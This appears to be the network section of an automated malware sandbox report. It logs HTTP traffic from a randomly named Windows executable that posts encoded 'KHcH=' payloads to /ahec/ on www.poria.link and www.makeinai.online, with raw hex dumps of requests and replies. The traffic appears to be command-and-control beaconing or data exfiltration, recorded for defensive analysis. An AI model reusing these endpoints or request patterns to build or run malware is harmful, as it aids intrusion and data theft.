                                                                          Data Raw: 4b 48 63 48 3d 46 58 69 45 46 63 6e 59 54 68 35 54 58 68 69 68 2f 35 63 31 4c 4e 66 58 67 52 39 43 45 42 72 5a 69 63 62 79 65 50 31 55 2b 64 72 6f 67 42 72 4d 61 76 61 34 34 44 49 71 54 33 59 71 48 6f 53 68 74 7a 55 31 46 56 50 63 5a 48 6b 6e 47 57 4c 64 74 50 39 71 31 46 43 30 63 33 4d 65 53 41 72 76 2f 44 67 75 4c 74 4d 54 7a 62 56 38 68 68 6d 4e 4f 64 43 76 2b 47 53 6a 73 45 44 6a 64 6b 43 76 6d 45 62 62 47 61 74 6a 57 6f 67 4d 78 45 35 69 30 76 62 52 44 74 43 4b 73 56 41 5a 38 56 79 69 6e 78 38 71 4c 4e 63 54 4b 47 36 75 6a 5a 74 63 65 37 5a 43 32 58 58 77 45 73 77 4e 39 31 43 52 41 6a 43 59 75 71 38 3d
                                                                          Data Ascii: KHcH=FXiEFcnYTh5TXhih/5c1LNfXgR9CEBrZicbyeP1U+drogBrMava44DIqT3YqHoShtzU1FVPcZHknGWLdtP9q1FC0c3MeSArv/DguLtMTzbV8hhmNOdCv+GSjsEDjdkCvmEbbGatjWogMxE5i0vbRDtCKsVAZ8Vyinx8qLNcTKG6ujZtce7ZC2XXwEswN91CRAjCYuq8=


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          7192.168.2.549723172.67.184.73801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:48:04.496664047 CET1815OUTPOST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.poria.link
                                                                          Origin: http://www.poria.link
                                                                          Referer: http://www.poria.link/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 1217
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Raw: 4b 48 63 48 3d 46 58 69 45 46 63 6e 59 54 68 35 54 58 68 69 68 2f 35 63 31 4c 4e 66 58 67 52 39 43 45 42 72 5a 69 63 62 79 65 50 31 55 2b 64 6a 6f 67 79 6a 4d 61 4e 79 34 35 44 49 71 4e 6e 59 72 48 6f 53 5a 74 7a 38 78 46 56 44 71 5a 43 34 6e 55 6c 44 64 6b 65 39 71 76 56 43 30 65 33 4d 64 63 67 72 41 2f 44 51 71 4c 75 30 54 7a 62 56 38 68 69 2b 4e 4c 2f 36 76 34 47 53 73 6c 6b 44 52 5a 6b 43 58 6d 45 54 4c 47 61 70 56 57 62 6f 4d 78 6b 70 69 32 39 44 52 50 74 43 4d 34 31 41 42 38 56 2f 67 6e 78 68 56 4c 49 67 31 4b 42 57 75 67 2f 6f 62 61 49 42 53 6f 45 6a 33 50 35 59 6a 36 46 53 5a 54 51 61 76 34 4b 64 65 6d 49 49 66 46 57 34 52 76 59 4d 2f 64 32 6e 33 70 47 73 31 7a 38 71 58 73 68 34 49 4e 44 45 32 77 74 78 4e 6a 61 49 6d 48 4a 30 36 33 67 61 64 2f 42 72 46 66 49 73 6c 49 76 51 69 41 49 4b 54 72 35 52 5a 56 32 4b 66 65 7a 2f 6b 4d 46 57 45 31 6e 7a 5a 59 31 78 66 41 71 6d 53 67 51 76 50 57 75 31 4d 36 55 74 34 4c 37 2f 63 63 63 68 72 69 6b 62 57 31 61 36 59 65 68 2f 6e 38 2b 55 61 78 45 77 4c 36 76 32 7a 4d 6b 58 2b 6a 65 2f 42 45 44 5a 6b 73 6b 39 66 78 7a 65 62 74 67 71 51 77 75 30 6e 54 43 53 51 41 2f 72 67 62 39 62 2f 67 33 48 39 44 4f 76 43 70 38 2f 54 50 45 35 41 76 4a 77 54 59 44 2b 74 65 6d 4a 32 33 45 58 55 63 78 33 34 38 43 4b 58 58 78 56 53 62 45 46 4e 4b 65 43 79 51 54 49 72 53 6a 62 72 45 6e 4f 50 44 4f 38 41 71 71 77 64 61 39 51 42 48 6a 46 32 6d 58 59 2f 66 43 4f 4e 62 46 44 43 55 4a 44 4a 69 6d 54 61 4d 6f 61 35 4b 41 35 33 69 77 51 72 45 33 5a 43 42 62 38 34 4f 45 67 35 48 4e 73 77 33 6d 47 41 2f 43 32 34 32 52 69 54 6f 49 63 79 79 63 4a 76 71 67 39 62 58 56 62 49 50 6c 52 75 53 49 31 63 52 67 6d 4c 4e 4a 39 6e 62 4b 53 6e 73 74 7a 61 30 41 6c 51 31 43 65 57 48 61 48 64 65 48 56 71 69 59 69 7a 72 78 38 51 38 67 57 4f 4f 37 65 35 77 6f 6b 4a 75 2b 4c 67 46 37 52 76 61 7a 68 62 59 34 56 5a 5a 42 4d 42 4c 4b 6c 36 31 6d 6e 33 63 38 47 36 66 36 55 54 4c 46 65 59 45 34 48 4f 65 54 71 75 78 70 2b 41 55 37 75 56 46 4e 70 4f 46 72 73 78 71 44 47 46 50 61 32 51 79 4a 41 56 6b 56 4a 58 59 6b 56 46 51 71 6d 78 46 71 52 6d 44 68 43 4d 2b 58 34 58 2f 4a 49 47 44 39 64 79 62 74 51 55 70 77 4f 41 49 77 63 44 62 47 74 49 70 69 50 6b 77 72 74 6c 77 30 59 2b 4c 4e 64 4e 4b 38 64 38 41 50 58 61 2f 7a 45 51 6e 37 42 31 59 55 32 55 36 36 7a 36 78 58 35 69 2b 38 67 55 33 5a 38 48 57 61 34 7a 74 76 50 51 57 63 48 63 36 30 43 31 78 46 5a 76 48 31 77 56 6a 51 2b 39 2f 49 36 78 34 4b 6f 32 54 6f 46 58 55 63 79 69 72 6b 68 65 62 57 64 4a 79 6e 33 45 54 75 53 55 78 57 31 6a 45 34 39 77 4a 54 57 54 54 66 58 71 63 65 4b 58 65 50 31 4f 69 75 62 63 67 77 77 57 49 2b 49 34 6d 48 7a 6e 5a 71 7a 4b 47 75 4f 39 6e 74 2f 31 4a 65 69 6f 76 78 54 73 64 48 6f 6a 72 70 56 52 49 6d 38 47 4a 4e 6f 42 68 45 68 5a 49 52 54 7a 38 49 77 64 76 6d 43 76 6b 41 68 6c 31 37 6f 64 4d 78 41 67 68 66 49 78 58 4d 7a 69 6a 52 58 56 47 39 56 77 59 63 76 6e 42 6b 2f 6e 4f 79 32 50 7a 52 43 6a 33 78 56 77 4a 4d 57 6d 75 67 50 49 51 41 4c 69 78 35 4e 41 66 57 74 65 67 75 59 58 6e 6f 49 77 36 4e 41 72 31 71 68 75 74 7a 58 77 31 67 4b 51 71 78 76 56 67 72 44 36 73 69 44 59 63 73 66 70 33 5a 6a 65 6b 2b 57 45 6d 57 79 72 52 43 6d 4a 78 6e 7a 64 32 74 59 39 2f 4c 70 32 70 32 66 6f 52 6f 39 6c 49 6c 69 30 4a 75 43 67 7a 4f 35 43 4f 65 76 70 77 33 59 69 56 72 78 48 33 5a 41 55 66 59 76 61 50 4b 54 46 59 70 30 58 46 78 67 6c 4a 6f 67 58 34 74 6f 48 51 50 77 45 5a 32 6d 4f 71 50 34 6a 4c 54 4a 6a 6e 68 37 65 50 58 4e 49 4b 47 69 73 4b 32 4b 42 4f 7a 6b 64 46 79 57 77 64 47 63 46 4f 5a 50 31 6c 42 6c 2f 6f 43 6f 67 36 34 6c 30 79 49 63 31 33 58 68 56 66 4e 2b 4f 43 31 35 71 5a 34 32 65 4a 36 53 68 67 75 4d 57 4c 52 2f 58 2f 37 64 59
                                                                          Data Ascii: KHcH=FXiEFcnYTh5TXhih/5c1LNfXgR9CEBrZicbyeP1U+djogyjMaNy45DIqNnYrHoSZtz8xFVDqZC4nUlDdke9qvVC0e3MdcgrA/DQqLu0TzbV8hi+NL/6v4GSslkDRZkCXmETLGapVWboMxkpi29DRPtCM41AB8V/gnxhVLIg1KBWug/obaIBSoEj3P5Yj6FSZTQav4KdemIIfFW4RvYM/d2n3pGs1z8qXsh4INDE2wtxNjaImHJ063gad/BrFfIslIvQiAIKTr5RZV2Kfez/kMFWE1nzZY1xfAqmSgQvPWu1M6Ut4L7/ccchrikbW1a6Yeh/n8+UaxEwL6v2zMkX+je/BEDZksk9fxzebtgqQwu0nTCSQA/rgb9b/g3H9DOvCp8/TPE5AvJwTYD+temJ23EXUcx348CKXXxVSbEFNKeCyQTIrSjbrEnOPDO8Aqqwda9QBHjF2mXY/fCONbFDCUJDJimTaMoa5KA53iwQrE3ZCBb84OEg5HNsw3mGA/C242RiToIcyycJvqg9bXVbIPlRuSI1cRgmLNJ9nbKSnstza0AlQ1CeWHaHdeHVqiYizrx8Q8gWOO7e5wokJu+LgF7RvazhbY4VZZBMBLKl61mn3c8G6f6UTLFeYE4HOeTquxp+AU7uVFNpOFrsxqDGFPa2QyJAVkVJXYkVFQqmxFqRmDhCM+X4X/JIGD9dybtQUpwOAIwcDbGtIpiPkwrtlw0Y+LNdNK8d8APXa/zEQn7B1YU2U66z6xX5i+8gU3Z8HWa4ztvPQWcHc60C1xFZvH1wVjQ+9/I6x4Ko2ToFXUcyirkhebWdJyn3ETuSUxW1jE49wJTWTTfXqceKXeP1OiubcgwwWI+I4mHznZqzKGuO9nt/1JeiovxTsdHojrpVRIm8GJNoBhEhZIRTz8IwdvmCvkAhl17odMxAghfIxXMzijRXVG9VwYcvnBk/nOy2PzRCj3xVwJMWmugPIQALix5NAfWteguYXnoIw6NAr1qhutzXw1gKQqxvVgrD6siDYcsfp3Zjek+WEmWyrRCmJxnzd2tY9/Lp2p2foRo9lIli0JuCgzO5COevpw3YiVrxH3ZAUfYvaPKTFYp0XFxglJogX4toHQPwEZ2mOqP4jLTJjnh7ePXNIKGisK2KBOzkdFyWwdGcFOZP1lBl/oCog64l0yIc13XhVfN+OC15qZ42eJ6ShguMWLR/X/7dY


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          8192.168.2.549725172.67.184.73801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:48:07.153966904 CET514OUTGET /ahec/?Vjk=-N-tntX&KHcH=IVKkGpXtV1toVTOE4YlrK/DLoA9BOULGifHJVqVOgN7K+V/6a9WE/CA4RHgfE4yJ8GdRU2XQNCMfR2HSu9NM5VjrVHIYZDWS5A== HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Host: www.poria.link
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Dec 2, 2023 18:48:37.802370071 CET808INHTTP/1.1 522
                                                                          Date: Sat, 02 Dec 2023 17:48:37 GMT
                                                                          Content-Type: text/plain; charset=UTF-8
                                                                          Content-Length: 15
                                                                          Connection: close
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WVrlndEIhrZs5Wz9KpXEbPcalzp%2BmMV%2FPMQKyISgrhsfTssCnbed7l6Pmrbhb1qi4yQyGfldODV1PwSMNYoOXYBSdGZuqMu7JnBWrRK255WVYa9hR9v%2FSsvGfptFNxs8Iw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          Referrer-Policy: same-origin
                                                                          Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                          Server: cloudflare
                                                                          CF-RAY: 82f566210d1320a0-IAD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                                          Data Ascii: error code: 522


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          9192.168.2.54972837.140.192.89801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:48:43.601402044 CET797OUTPOST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.makeinai.online
                                                                          Origin: http://www.makeinai.online
                                                                          Referer: http://www.makeinai.online/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 185
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Raw: 4b 48 63 48 3d 42 77 31 4a 49 64 62 4d 57 32 4b 6f 4a 55 4b 2b 42 65 36 4a 79 58 4f 56 50 79 43 65 39 6f 6f 68 56 4d 49 73 77 33 30 58 32 79 58 69 2f 6b 74 36 73 52 68 72 6c 50 55 2f 4d 56 78 65 59 30 67 6e 58 73 66 66 38 2b 68 72 2b 58 34 4e 65 43 32 36 52 58 2b 39 6c 6e 4f 58 59 65 43 49 41 65 56 37 75 68 6c 42 5a 2f 72 59 55 64 70 4c 63 2b 44 6f 39 31 37 48 51 4a 55 77 6d 6b 74 45 66 50 53 55 6c 53 75 4f 4c 74 37 77 70 73 50 31 39 68 32 6d 79 43 77 49 68 71 38 4a 78 49 45 69 49 57 47 76 66 50 41 66 74 2f 7a 65 45 5a 4b 79 4a 7a 70 7a 37 51 3d 3d
                                                                          Data Ascii: KHcH=Bw1JIdbMW2KoJUK+Be6JyXOVPyCe9oohVMIsw30X2yXi/kt6sRhrlPU/MVxeY0gnXsff8+hr+X4NeC26RX+9lnOXYeCIAeV7uhlBZ/rYUdpLc+Do917HQJUwmktEfPSUlSuOLt7wpsP19h2myCwIhq8JxIEiIWGvfPAft/zeEZKyJzpz7Q==
                                                                          Dec 2, 2023 18:48:43.824506044 CET1340INHTTP/1.1 403 Forbidden
                                                                          Server: nginx
                                                                          Date: Sat, 02 Dec 2023 17:48:43 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          ETag: W/"64f9f107-377d8"
                                                                          Content-Encoding: gzip
                                                                          Data Raw: 36 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd ef 8e db 48 b2 2f f8 7d 9e 42 a5 83 b6 a5 31 a5 e2 7f 52 92 e9 9a 9e 1e f7 99 c6 99 9e 6e 8c fb f4 60 51 63 08 2c 89 2a b1 4d 89 ba 24 55 e5 72 b9 0e ee dd 27 d9 af fb ed ec 05 16 d8 c5 ee de 05 f6 09 e6 bc d1 46 44 92 14 ff 4a 49 51 e5 6a fb 4c 75 5b a2 c8 cc 88 cc c8 c8 c8 5f 44 06 c9 97 67 73 7f 16 dd 6d 9c ce 32 5a 79 af 5e e2 67 c7 b3 d7 d7 56 d7 59 77 e1 b7 63 cf 5f bd 5c 39 91 dd 99 2d ed 20 74 22 ab fb af 3f 7d 3b 30 e1 5a e4 46 9e f3 ea ef ff cb df ff fd ef ff db df ff c7 7f fc cf 7f ff f7 ce 7f fc 37 f8 f1 7f d2 e1 df ff fb 7f fc d7 bf ff ef 7f ff bf e1 df ff 03 ff fd 8f ce df ff 5f 38 f1 7f 40 c1 ff 86 d7 f1 d4 df ff fb df ff 2f ba fc ef 2f cf 19 b1 97 61 74 e7 39 9d 95 33 77 6d ab 6b 7b 5e f7 d5 f9 6f cf 7e fb b9 ff 9d fd f6 6f bf e9 74 b0 1f 9d 59 18 76 86 e7 6b 7f ee 4c 57 fe 7c eb 39 e1 39 9c 1a 78 be 3d 77 82 73 77 3d 77 de 0f 7f 09 2f 2e 66 9e bf 76 e6 7f 81 02 6f 9c 68 a0 0f b7 a1 73 29 bd 3d 2b 54 dd f8 61 94 a9 1e 06 b3 94 44 b1 28 fc 4b cb cd dd 30 3a 9f fd 12 b2 62 57 ce ea fc ca f3 67 ef c2 a1 3d b7 37 91 7b e3 9c 5f 0d 36 f6 75 f2 35 c4 ba 1d ec 07 f4 e2 6f 4f 2d cc d6 7f e7 bf 19 b2 7e dd 83 1c 36 9e 7d 37 5e 78 ce fb 09 7e 0c e6 6e e0 cc 22 d7 5f 8f 67 be b7 5d ad 27 b7 ee 3c 5a 8e 25 51 fc 6a b2 72 d7 03 f6 53 91 c5 cd fb c9 d2 71 af 97 11 bb b6 b1 e7 73 77 7d 3d d6 8c cd fb 8e d8 11 27 2b 3b b8 76 d7 63 71 02 74 fc 60 fc 4f 8a ae c2 ff 93 85 bf 86 1a 32 14 fa 6e 1d 39 81 f0 75 e0 da 9e f0 47 c7 bb 71 22 77 66 77 fe ec 6c 9d dd 4f e1 db c0 71 de d8 eb 50 08 e1 63 10 3a 81 bb 98 5c d9 b3 77 d7 81 bf 5d cf c7 ff b4 58 2c 26 83 5b e7 ea 9d 1b 0d 22 7b 33 58 42 8b 3c 6c d5 80 b1 8d 02 a8 b7 b1 03 67 1d 3d e0 d4 1e af fd a8 37 74 c3 69 32 d0 fd 4e 22 0b ff c6 09 16 9e 7f 3b 78 3f 5e ba f3 b9 b3 7e f8 1d 4d c3 4e 6f d7 6f 49 94 d5 cd fb fe 7d 96 c2 1e 02 0f f1 a5 29 1a 98 29 34 e3 1d 88 e8 1e c9 ed 44 77 b3 cc 97 72 82 c0 0f 18 c1 44 a6 e2 81 a6 4f 57 ce 7a 3b c0 c2 38 70 70 7d ee cc 85 e6 55 06 f6 0c cb 24 6c 07 91 bf 01 d6 cd 84 50 45 b7 40 f0 a1 61 13 24 d4 b5 13 34 a3 ba 7b 87 b4 22 57 3a 33 03 46 23 1d 5a 75 40 c8 70 c5 5d dc 0d ae 02 ff 16 54 77 7a e3 86 ee 95 97 a7 a9 a9 8d 3b 77 a0 4d 95 f2 e0 6d c9 6e 70 fc 2b d7 73 06 89 4e 4f 99 46 0b c9 e5 70 7b 85 22 9e fa 1b 07 ac 74 aa fa 89 e2 1f 90 cb 74 e1 fb 30 f9 07 73 ff 76 7d 50 51 ab 1b 72 a0 56 5d fb e2 8e 37 55 a7 43 e4 1a ab 67 65 a7 2a e8 0e dd dd b0 27 c6 9a 96 aa 87 2a 59 de a3 09 1f 4b 60 7f ed 6d e4 4f 8a a3 92 21 96 af 96 b7 48 5f 35 ed 4d 8e 56 45 1f 2a 8a 4d d3 ae 27 aa 58 aa 57 ac 06 9d a8 66 09 a6 1e 96 92 75 94 6a f3 95 1f 45 fe 0a 26 77 1d 09 f6 33 15 e8 1a 90 c6 ae 6c 4c 6d 70 1b d8 9b 0d 94 4a 16 32 92 69 6d b1 29 01 b7 29 82 8f 4c 4b 02 92 29 8a 2e 59 20 07 9e b3 60 67 f8 48 4d d7 ce 6d 81 9c 6a 16 c9 e1 99 83 73 ae d8 af 06 76 ac 49 67 c5 7c d3 1a 2f 20 7b db c9 55 a3 51 eb 1a 77 9d 16 e9 25 c0 4e 24 12 46 36 c0 94 b8 89 a6 78 c4 42 d5 98 fe 4e 6d 92 e5 2d 3b 7d 75 71 a7 1b f4 83 b0 98 07 70 77 40 52 19 20 79 a6 f0 87 3a 9e 92 4f 61 48 8a e9 3a 03 49 63 a4 1b 77 97 8f 6a b9 93 bb e9 58 00 a1 3b 3a 3b 5c 18 83 bf 7f 5a c8 0b 75 31 e2 ee 69 05 0f a6 76 c7 76 b2 96 60 45 ff c8 ff 03 03
                                                                          Data Ascii: 6000H/}B1Rn`Qc,*M$Ur'FDJIQjLu[_Dgsm2Zy^gVYwc_\9- t"?};0ZF7_8@//at93wmk{^o~otYvkLW|99x=wsw=w/.fvohs)=+TaD(K0:bWg=7{_6u5oO-~6}7^x~n"_g]'<Z%QjrSqsw}='+;vcqt`O2n9uGq"wfwlOqPc:\w]X,&["{3XB<lg=7ti2N";x?^~MNooI}))4DwrDOWz;8pp}U$lPE@a$4{"W:3F#Zu@p]Twz;wMmnp+sNOFp{"tt0sv}PQrV]7UCge*'*YK`mO!H_5MVE*M'XWfujE&w3lLmpJ2im))LK).Y `gHMmjsvIg|/ {UQw%N$F6xBNm-;}uqpw@R y:OaH:IcwjX;:;\Zu1ivv`E
                                                                          Dec 2, 2023 18:48:43.824522018 CET1340INData Raw: ee db d1 18 75 93 21 65 43 14 3b d8 cd 73 45 6c 03 99 3d 77 ed 24 2a a2 99 59 db 93 e7 3f 80 82 ef ee 23 e7 7d 34 98 3b 33 3f b0 c9 13 c8 db c7 8a 1a e3 25 5a ef 52 3d 18 09 27 40 d6 75 95 51 62 ac df 89 29 76 d7 35 e5 dd c8 59 dd 83 b7 47 bf c6
                                                                          Data Ascii: u!eC;sEl=w$*Y?#}4;3?%ZR='@uQb)v5YG(I~.';<N6Nz$*jvn^_aVa5Nmz]R0T=j0d9v0E|9-Eq=%l)MF1qax
                                                                          Dec 2, 2023 18:48:43.824690104 CET1340INData Raw: 83 53 15 67 c3 f2 c9 d2 89 2b ff 3d ce 61 5c 32 52 13 f6 be 18 25 f3 37 91 bb 82 59 fd 27 70 41 ae 5c cf 8d ee 1e 52 79 0b e9 d1 98 65 fd 65 4e c4 7b d5 18 81 63 6b c7 50 96 c3 8e 63 87 ce c0 5d 0f fc 6d b4 23 73 09 c3 63 83 1f 31 7f bb ab 3f c5
                                                                          Data Ascii: Sg+=a\2R%7Y'pA\RyeeN{ckPc]m#sc1?g\I6KzQqCua'c'{23^bx%)orLBPIzIDVdB(^ -.,#4~>#FU!e%_RM@&D=~^5tW^b{%QV68o}
                                                                          Dec 2, 2023 18:48:43.824703932 CET1340INData Raw: ad 53 c1 60 6e 1e 8f 19 da 7d 2c 49 f1 02 dd 83 d5 0f c0 db 83 f5 0f 80 da cc 0d 3c ec 19 33 9b c0 5d d9 c1 dd 7d f9 bd 09 a2 38 13 4d b5 ae 42 56 82 f8 28 04 7a 5a 80 50 53 38 7e 96 40 15 8f b9 3d d2 eb 78 c4 8f 28 a8 ac 67 1b 86 5c 57 6f b0 76
                                                                          Data Ascii: S`n},I<3]}8MBV(zZPS8~@=x(g\WovnRlw?46-T,XhlDUvU}OdVxoMm-?(^]#3,5UJ1EY!9$cE->i*MoUWeA!
                                                                          Dec 2, 2023 18:48:43.825041056 CET1340INData Raw: a0 c5 7a e9 e3 b8 f3 4d 36 5a bd 4a 2c df e4 e4 e9 ca 75 ac 0f 34 5d 2f b7 9c 1e 8a 9f 36 18 53 1f cf f5 56 2f 07 cb 37 38 79 c6 78 81 e3 81 76 8e ca dd bc 72 af 85 32 9d b2 c8 a9 07 da 09 b5 24 79 a6 70 be 2d 15 1d d8 d3 bc 03 dd ad 10 12 3e 48
                                                                          Data Ascii: zM6ZJ,u4]/6SV/78yxvr2$yp->H?r%G\U'T_dR!VIV0kgWsYe,BNP m\zAC9g3<_ms+E}&w3bY!Tb
                                                                          Dec 2, 2023 18:48:43.825078011 CET1340INData Raw: 8e 4f b6 88 a4 cf bc 7d 88 f9 c6 5f 87 1e 99 87 45 76 2e 60 6c 56 4e ed 5b 9b d5 dc b2 cf 73 cb 37 55 28 17 de df 9f 03 1c 32 fd 3a a5 5b 5d e6 ba 7b 34 ed c9 1d dd f4 41 b8 39 66 bc 32 4c 9e 60 5b 2f c2 fd f4 33 9d 3a a5 8f 5b 66 9a 3e 45 f6 e4
                                                                          Data Ascii: O}_Ev.`lVN[s7U(2:[]{4A9f2L`[/3:[f>E*W_z)2fO3s`\z'Vk'wOG)>3[`+e,U=Tfy]lNhs\3<((5a
                                                                          Dec 2, 2023 18:48:43.825598955 CET1340INData Raw: 86 9a a6 75 c4 81 6e 0e 14 71 a8 aa 2a 1e e9 66 48 3f 34 38 ea d0 ef 19 15 84 da f0 b3 c3 0a 76 e8 5a 38 48 7f b1 c2 1f 9e 9f b3 be ce dc 60 e6 39 e5 de ce de 5b cf 59 5b e0 f8 2e 3e 36 9e 77 02 eb b9 2e 0d 65 51 4e 08 e4 85 f5 ed b7 df 32 49 8d
                                                                          Data Ascii: unq*fH?48vZ8H`9[Y[.>6w.eQN2I('eh<gMJks(*@2#?;O!9%|*JDj+( Pe:Gz%XT+$IUWT?Pp*#X?|oC;645g*Aq
                                                                          Dec 2, 2023 18:48:43.825613976 CET1340INData Raw: 8b 03 75 c1 08 13 5c d7 b1 77 20 59 b4 33 e2 c8 08 61 89 c0 a5 43 03 eb 05 67 74 5a b9 0c 05 9d 26 13 87 0a 5d 0a c3 40 c7 40 87 d1 95 d0 62 ca 60 83 35 e8 0d ac 9f b0 1c c3 a7 6c a0 af 23 2b e8 8a 28 84 2f 68 71 90 45 30 7f b0 1e 82 d4 c0 a2 c1
                                                                          Data Ascii: u\w Y3aCgtZ&]@@b`5l#+(/hqE0?4,^pl_`4UV/6y+5s'dp#jZB3`/C~92u02s2p"T5iP+0Awd_FudDRZ4i&p<$bPE{ |
                                                                          Dec 2, 2023 18:48:43.825886965 CET1340INData Raw: 67 a9 84 fe 61 a5 ea 60 f4 d0 29 1e 61 84 09 b7 51 60 8a ea 36 4e 0c 59 eb c4 5f 24 08 05 1d 26 84 4d b2 e9 01 30 20 ef 55 c3 d0 12 46 09 75 09 e3 63 d4 4b 99 42 82 06 6d 3a 89 60 bf d0 01 42 b9 23 1c c3 58 fb 60 48 3f 45 d4 46 2c ae e0 74 05 8d
                                                                          Data Ascii: ga`)aQ`6NY_$&M0 UFucKBm:`B#X`H?EF,t6F:#FNeh9u-&$"m_=QPE<BA(B@9TGr}o8ZqZ1p}3"4\hR!&RAdf0m L^(WGn`74]@H<a
                                                                          Dec 2, 2023 18:48:43.825905085 CET1340INData Raw: 8d d5 5a 2a d2 8d 64 2c 07 8a f4 a1 7a 13 53 14 bf 36 46 7f 88 4d 3a e6 dc 76 24 dc 99 c7 cd 20 5d c1 94 3b 53 5d d2 76 7f 4d fd 74 13 d4 c4 54 0f 1d e3 8b 7f 84 5a 8a 6e ab 2a 6d 6d c5 5f b4 95 81 d9 19 18 94 9d 89 14 18 67 3b 31 22 6e 9c 9a 94
                                                                          Data Ascii: Z*d,zS6FM:v$ ];S]vMtTZn*mm_g;1"no5,esn$f@Sbjq6I!8P4`7:}d&li_YQBk0Kg(h51nU<})MS:&G
                                                                          Dec 2, 2023 18:48:44.045376062 CET1340INData Raw: fe 56 51 ca b7 c3 e0 ed 84 72 27 9e 76 26 0a 19 d3 b6 4c cd a0 4f f3 6b 95 ee b5 60 9f 98 01 06 33 73 04 eb 84 3e d4 fe 88 93 01 6f e8 10 55 98 bc a6 22 79 54 a3 43 9f 76 b1 1e bb 06 96 c4 94 59 e9 1b bc 2f 5c a1 29 a7 fe 0c c7 ba 61 d8 0a dd 54
                                                                          Data Ascii: VQr'v&LOk`3s>oU"yTCvY/\)aT><M8d(}u3 ?(DUa7g'yC@*}4_}WKB~|lR)s1%rbEA/O34Pksj6fVIo


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          10192.168.2.54972937.140.192.89801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:48:46.355299950 CET817OUTPOST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.makeinai.online
                                                                          Origin: http://www.makeinai.online
                                                                          Referer: http://www.makeinai.online/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 205
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Raw: 4b 48 63 48 3d 42 77 31 4a 49 64 62 4d 57 32 4b 6f 50 33 53 2b 4e 5a 6d 4a 30 33 4f 57 44 53 43 65 7a 49 6f 6c 56 4d 45 73 77 31 59 48 32 41 7a 69 2f 46 64 36 76 54 4a 72 67 50 55 2f 55 6c 77 57 46 45 67 38 58 73 69 69 38 37 5a 72 2b 55 45 4e 65 48 79 36 51 6b 47 69 6b 33 4f 56 51 2b 43 4f 66 75 56 37 75 68 6c 42 5a 37 44 79 55 64 78 4c 63 50 54 6f 38 55 37 45 64 70 55 7a 6e 6b 74 45 55 76 54 38 6c 53 76 72 4c 6f 65 56 70 71 54 31 39 6c 36 6d 78 54 77 4a 75 71 38 4c 75 59 45 73 46 6a 7a 32 61 73 52 57 76 2b 6e 66 62 5a 76 5a 42 47 46 67 38 69 39 50 34 32 43 39 53 69 71 74 52 75 39 5a 47 51 73 78 65 67 38 3d
